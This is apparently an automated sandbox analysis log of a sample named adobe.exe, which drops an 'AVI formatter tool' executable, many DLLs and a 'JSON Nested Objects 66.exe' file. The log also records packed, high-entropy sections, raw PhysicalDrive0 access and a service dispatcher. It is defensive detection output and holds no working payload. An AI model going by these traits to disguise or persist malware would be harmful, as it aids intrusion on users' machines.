                Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: adobe.tmp, 00000001.00000002.2904468325.000000000072E000.00000004.00000020.00020000.00000000.sdmp, adobe.tmp, 00000001.00000003.1648820462.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, 00000001.00000002.2904768508.0000000002313000.00000002.00000001.01000000.00000006.sdmp, adobe.tmp, 00000001.00000003.1648885833.0000000002348000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr

                Data Obfuscation

                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Unpacked PE file: 2.2.aviformattertool.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_vset_8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Unpacked PE file: 3.2.aviformattertool.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_vset_8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Unpacked PE file: 2.2.aviformattertool.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Unpacked PE file: 3.2.aviformattertool.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress
                Source: initial sample | Static PE information: section where entry point is pointing to: petite
                Source: aviformattertool.exe.1.dr | Static PE information: section name: _vset_8
                Source: is-LAMVM.tmp.1.dr | Static PE information: section name: .sxdata
                Source: is-1V9NR.tmp.1.dr | Static PE information: section name: .didata
                Source: is-ETIM8.tmp.1.dr | Static PE information: section name:
                Source: is-ETIM8.tmp.1.dr | Static PE information: section name:
                Source: is-ETIM8.tmp.1.dr | Static PE information: section name: petite
                Source: is-N9KV6.tmp.1.dr | Static PE information: section name:
                Source: is-N9KV6.tmp.1.dr | Static PE information: section name:
                Source: is-N9KV6.tmp.1.dr | Static PE information: section name:
                Source: is-SD2K4.tmp.1.dr | Static PE information: section name:
                Source: is-SD2K4.tmp.1.dr | Static PE information: section name:
                Source: is-SD2K4.tmp.1.dr | Static PE information: section name: petite
                Source: is-CHQ62.tmp.1.dr | Static PE information: section name:
                Source: is-CHQ62.tmp.1.dr | Static PE information: section name:
                Source: is-CHQ62.tmp.1.dr | Static PE information: section name: petite
                Source: is-USOE1.tmp.1.dr | Static PE information: section name:
                Source: is-USOE1.tmp.1.dr | Static PE information: section name:
                Source: is-USOE1.tmp.1.dr | Static PE information: section name:
                Source: is-TA1T4.tmp.1.dr | Static PE information: section name:
                Source: is-TA1T4.tmp.1.dr | Static PE information: section name:
                Source: is-TA1T4.tmp.1.dr | Static PE information: section name: petite
                Source: is-268GJ.tmp.1.dr | Static PE information: section name: /4
                Source: is-O3BDJ.tmp.1.dr | Static PE information: section name: /4
                Source: is-2NPHT.tmp.1.dr | Static PE information: section name: /4
                Source: is-G2Q7A.tmp.1.dr | Static PE information: section name:
                Source: is-G2Q7A.tmp.1.dr | Static PE information: section name:
                Source: is-G2Q7A.tmp.1.dr | Static PE information: section name: petite
                Source: is-RTU9Q.tmp.1.dr | Static PE information: section name:
                Source: is-RTU9Q.tmp.1.dr | Static PE information: section name: petite
                Source: is-QIBJG.tmp.1.dr | Static PE information: section name:
                Source: is-QIBJG.tmp.1.dr | Static PE information: section name:
                Source: is-QIBJG.tmp.1.dr | Static PE information: section name:
                Source: is-G867L.tmp.1.dr | Static PE information: section name:
                Source: is-G867L.tmp.1.dr | Static PE information: section name:
                Source: is-G867L.tmp.1.dr | Static PE information: section name:
                Source: is-B8D2L.tmp.1.dr | Static PE information: section name: /4
                Source: is-6BR28.tmp.1.dr | Static PE information: section name: .eh_fram
                Source: is-5PBSD.tmp.1.dr | Static PE information: section name: asmcode
                Source: is-5EUCF.tmp.1.dr | Static PE information: section name: .eh_fram
                Source: is-G9QV0.tmp.1.dr | Static PE information: section name: /4
                Source: is-B5I6T.tmp.1.dr | Static PE information: section name: /4
                Source: is-GDO6P.tmp.1.dr | Static PE information: section name: /4
                Source: is-JAMVB.tmp.1.dr | Static PE information: section name: /4
                Source: is-R0SOB.tmp.1.dr | Static PE information: section name: .trace
                Source: is-R0SOB.tmp.1.dr | Static PE information: section name: _RDATA
                Source: is-R0SOB.tmp.1.dr | Static PE information: section name: .debug_o
                Source: is-DGTCL.tmp.1.dr | Static PE information: section name: /4
                Source: is-L5R6H.tmp.1.dr | Static PE information: section name: /4
                Source: is-P1JK8.tmp.1.dr | Static PE information: section name: /4
                Source: is-TS18M.tmp.1.dr | Static PE information: section name: /4
                Source: is-OJAID.tmp.1.dr | Static PE information: section name: /4
                Source: is-JAAP8.tmp.1.dr | Static PE information: section name: /4
                Source: is-29FOL.tmp.1.dr | Static PE information: section name: /4
                Source: is-H7480.tmp.1.dr | Static PE information: section name: /4
                Source: JSON Nested Objects 66.exe.2.dr | Static PE information: section name: _vset_8
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_0040CCA4 push esi; iretd 0_2_0040CDA1
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_0040CD83 push esi; iretd 0_2_0040CDA1
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00409954 push 00409991h; ret 1_2_00409989
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0040A04F push ds; ret 1_2_0040A050
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0040A023 push ds; ret 1_2_0040A04D
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax 1_2_004062CD
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004824F8 push 004825D6h; ret 1_2_004825CE
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx 1_2_004106E5
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00476724 push ecx; mov dword ptr [esp], edx 1_2_00476725
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00458AF0 push 00458B34h; ret 1_2_00458B2C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx 1_2_00442C98
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00450E68 push 00450E9Bh; ret 1_2_00450E93
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0045102C push ecx; mov dword ptr [esp], eax 1_2_00451031
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx 1_2_0040D03A
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004572B0 push 004572E8h; ret 1_2_004572E0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00493310 push ecx; mov dword ptr [esp], ecx 1_2_00493315
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0040546D push eax; ret 1_2_004054A9
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0045F544 push ecx; mov dword ptr [esp], ecx 1_2_0045F548
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx 1_2_0040F59A
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                Source: initial sample | Static PE information: section name: .text entropy: 7.585918071864499
                Source: initial sample | Static PE information: section name: _vset_8 entropy: 7.629148676433318
                Source: initial sample | Static PE information: section name: entropy: 7.921519965168042
                Source: initial sample | Static PE information: section name: entropy: 7.966771808365004
                Source: initial sample | Static PE information: section name: entropy: 7.950928332152424
                Source: initial sample | Static PE information: section name: entropy: 7.953893773659523
                Source: initial sample | Static PE information: section name: entropy: 7.491817342209834
                Source: initial sample | Static PE information: section name: .text entropy: 7.585918071864499
                Source: initial sample | Static PE information: section name: _vset_8 entropy: 7.629148676433318

                Persistence and Installation Behavior

                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 2_2_00401A4F CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_00401A4F CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A1F823 CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-P1JK8.tmp
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | File created: C:\ProgramData\JSON Nested Objects 66\JSON Nested Objects 66.exe
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libFLAC_dynamic.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libwebp.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-LAMVM.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-N9KV6.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\da.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-GDO6P.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-QIBJG.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\is-29FOL.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basscd.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\sd.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_RegDLL.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\daiso.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswv.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassopus.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_tta.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\tak_deco_lib.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-GV1D3.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-OJAID.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libsoxr.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-62TD5.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dstt.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-2NPHT.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G867L.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-6BR28.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-NLBLP.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-DGTCL.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswma.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmidi.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2pcmt.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_ofr.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\rg_ebur128.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\pcm2dsd.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\gain_analysis.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-O3BDJ.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\mp3gain.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-USOE1.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-B5I6T.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TS18M.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\uchardet.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\OptimFROG.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmix.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\wavpackdll.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_shfoldr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\is-H7480.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-1V9NR.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G9QV0.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_setup64.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\takdec.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\is-D26SF.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-L5R6H.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-M7I8F.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-JAAP8.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\lame_enc.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\ff_helper.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libdtsdec.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | File created: C:\Users\user\AppData\Local\AVI formatter tool\unins000.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_fx.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-7MMUT.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-B8D2L.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\utils.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-268GJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassflac.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-R0SOB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-JAMVB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\d_writer.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_isdecmp.dllJump to dropped file
                Source: C:\Users\user\Desktop\adobe.exeFile created: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-CHQ62.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_iscrypt.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-RTU9Q.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-5EUCF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-5PBSD.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeFile created: C:\ProgramData\JSON Nested Objects 66\JSON Nested Objects 66.exeJump to dropped file

                Boot Survival

                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 2_2_00401A4F
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 3_2_00401A4F
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe Code function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0 3_2_02A1F823
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe Code function: 2_2_0040219E StartServiceCtrlDispatcherA, 2_2_0040219E
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423C1C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus, 1_2_004241EC
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_004241A4 IsIconic,SetActiveWindow, 1_2_004241A4
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_00418394
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_0042286C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_004175A8 IsIconic,GetCapture, 1_2_004175A8
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_00417CDE IsIconic,SetWindowPos, 1_2_00417CDE
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417CE0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_00481EB4 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_00481EB4
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Code function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0044AEAC
                Source: C:\Users\user\Desktop\adobe.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
